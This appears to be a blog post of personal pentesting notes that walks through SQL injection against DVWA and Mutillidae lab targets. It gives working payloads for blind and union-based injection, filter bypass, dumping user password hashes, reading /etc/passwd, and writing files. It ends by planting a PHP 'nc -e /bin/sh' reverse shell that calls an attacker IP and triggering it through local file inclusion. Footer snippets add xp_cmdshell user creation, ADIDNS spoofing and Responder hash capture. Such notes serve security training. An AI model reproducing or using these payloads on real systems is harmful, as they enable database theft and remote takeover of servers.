Skip to main content

Blind SQL Injection: Doenst display any errors to you

By
Blind SQL Injection: Doenst display any errors to you

1' and 1=1# --> 1' and 1=1%23    // True Statement
1' and 1=0# --> 1' and 1=0%23 // False Statement


Valid:
------
192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#
192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1' and 1=1%23&Submit=Submit#
   --------------

Invalid:
--------
192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1' and 1=0%23&Submit=Submit#


when we give a true statement, its giving a valid page and when a false statement is given no response is shown

1' order by 1%23 // True Statement
----------------------------------
192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1' order by 1%23&Submit=Submit#

1' order by 10000%23 // False Statement
---------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1%27%20order%20by%2010000%23&Submit=Submit#

output is displayed only when a valid statement is provided
output is not displayed if a invalid statement is provided. So, this page is vulnerable to sql injection

'union select 1,2%23

'union select table_name,2 from information_schema.tables%23
------------------------------------------------------------
Example:
http://192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id='union select table_name,2 from information_schema.tables%23&Submit=Submit#


---------------------------------------------------------------------------------------------------------------------------------------

when tried with true and false statements, if we get a response from the sql directly, then it is vulnerable to sql injection

1' order by 1%23  //worked
1' order by 2%23  //Worked
1' order by 2%23  //Didnt work
1' order by 10000%23 s

so, only 1 and 2

'union select 1,2%23
------------------------
1'union select database(),2%23
----------------------------------

Result :
ID: 1'union select database(),2#
First name: dvwa  --> database name
Surname: 2

'union select table_name,2 from information_schema.tables where table_schema= 'dvwa'%23
---------------------------------------------------------------------------------------

Result:
ID: 1'union select table_name,2 from information_schema.tables where table_schema= 'dvwa'#
First name: users
Surname: 2

'union select column_name,2 from information_schema.columns where table_name= 'users'%23
-----------------------------------------------------------------------------------------
Result:

ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: user_id
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: first_name
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: last_name
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: user
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: password
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: avatar
Surname: 2


'union select user,password from users%23
------------------------------------------
Result:

ID: 1'union select user,password from users#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: 1'union select user,password from users#
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: 1'union select user,password from users#
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1'union select user,password from users#
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1'union select user,password from users#
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99


-----------------------------------------------------------------------------------------------------------
============================================ DVWA MEDIUM SECURITY =========================================
-----------------------------------------------------------------------------------------------------------
1 and 1=1 // true Condition

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 and 1=1 %23&Submit=Submit#

1 and 1=2 // False condition  --> Blind SQL Worked

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 and 1=2%23&Submit=Submit#


1 union select 1,2%23
------------------
http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 union select 1,2%23&Submit=Submit#

Result:
ID: 1 union select 1,2
First name: admin
Surname: admin
ID: 1 union select 1,2
First name: 1
Surname: 2

so, we can write in 1 & 2

1 union select table_name,2 from information_schema.tables%23
-------------------------------------------------------------

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 union select table_name,2 from information_schema.tables%23&Submit=Submit#



1 union select table_name,2 from information_schema.tables where table_schema='dvwa'%23
---------------------------------------------------------------------------------------

some websites doenst allow '' symbols, so. we need to encode it into base 64 and send the request

dvwa in hex = 0x  64767761;

192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 union select table_name,2 from information_schema.tables where table_schema=0x64767761%23&Submit=Submit#

Result:

ID: 1 union select table_name,2 from information_schema.tables where table_schema=0x64767761#
First name: admin
Surname: admin
ID: 1 union select table_name,2 from information_schema.tables where table_schema=0x64767761#
First name: guestbook
Surname: 2
ID: 1 union select table_name,2 from information_schema.tables where table_schema=0x64767761#
First name: users
Surname: 2


-----------------------------------------------------------------------------------------------------------
========================================= CASE (Frequent Prob)============================================
-----------------------------------------------------------------------------------------------------------

-1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1%27%20+uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23&Submit=Submit#

multiple records are shwon, so go to var/www/html/dvwa/vulnerabilities/sqli/source/low.php
comment the while loop //  and save it

reaload the page and you can see single table

-1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23
----------------------------------------------------------------------

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=-1%27%20+uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23&Submit=Submit#

Result:

ID: -1'  uNioN/**/sEleCt/**/table_name,2 fRom information_schema.tables#
First name: CHARACTER_SETS
Surname: 2

// this is done because, in most of the websites only sinle result query is displayed.
// SO, to solve the problem use the following query

1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+1,2%23
--------------------------------------------------------------------------------


http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+1,2%23&Submit=Submit#

Result:

ID: 1'  uNioN/**/sEleCt/**/table_name,2 fRom information_schema.tables limit 1,2#
First name: CHARACTER_SETS
Surname: 2


http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1%27%20+uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+2,3%23&Submit=Submit#

Result:

ID: 1'  uNioN/**/sEleCt/**/table_name,2 fRom information_schema.tables limit 2,3#
First name: COLLATIONS
Surname: 2

we can keep on going ... 3-4, 4-5 and so,on ...



1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+where+table_schema='dvwa'+limit+2,3%23
---------------------------------------------------------------------------------------------------------

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+where+table_schema='dvwa'+limit+2,3%23&Submit=Submit#

ID: 1'  uNioN/**/sEleCt/**/table_name,2 fRom information_schema.tables where table_schema='dvwa' limit 2,3#
First name: users
Surname: 2


-----------------------------------------------------------------------------------------------------------
========================================== BYPASS FILTERS =================================================
-----------------------------------------------------------------------------------------------------------
and 1=1
aNd 222=222
anD 111=111
orDeR nY 1

bypassing spaces: + (or) /**/

union select 1,2 %23
uNioN+SelEcT+1,2+%23
uNioN/**/SeLecT/**/1,2/**/%23

/*
--
;--  end of the statement
; /*
;//

-----------------------------------------------------------------------------------------------------------
======================================== File Upload SQL Vulnerability ====================================
-----------------------------------------------------------------------------------------------------------

Read a file in the server:
---------------------------------------------------------------:
' union select null,load_file('/etc/passwd'),null,null,null%23 :
-------------------------------------------------------------- :

http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin' union select null,load_file('/etc/passwd'),null,null,null%23&password=password&user-info-php-submit-button=View+Account+Details


Write a file into the server:

' union select null,'example example', null,null,null into outfile '/var/www/example.txt'

192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin' union select null,'example example', null,null,null into outfile '/tmp/example.txt'%23&password=password&user-info-php-submit-button=View+Account+Details


-----------------------------------------------------------------------------------------------------------
================================ Reverse Shell SQL Vulnerability ==========================================
-----------------------------------------------------------------------------------------------------------

'union select 1,2 %23

-1 = no values come in between admin and admin


-1'union select '<?passthru("nc -e /bin/sh Attacker_IP 8080");?>',null into outfile '/tmp/reverse.php'%23

---------------------------------------------------------------------------------------------------------:
-1'union select '<?passthru("nc -e /bin/sh 192.168.149.148 8080");?>',null into outfile '/tmp/reverse.php'%23                                                                                     :
----------------------------------------------------------------------------------------------------------:

192.168.149.136/dvwa/vulnerabilities/sqli/?id=-1'union select '<?passthru("nc -e /bin/sh 192.168.149.148 8888");?>',null into outfile '/tmp/reverse1.php'%23&Submit=Submit#


in terminal
--> nc -vv -l -p 8888

now you need to run the file that we uploaded on the tmp diectory..
you need not be on the same website but can be on the same web server


find a local file inclusion vulnerabilty on the same server, need not be on same website

 http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../tmp/reverse1.php

thats it, reverse shell connection is established ..




Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more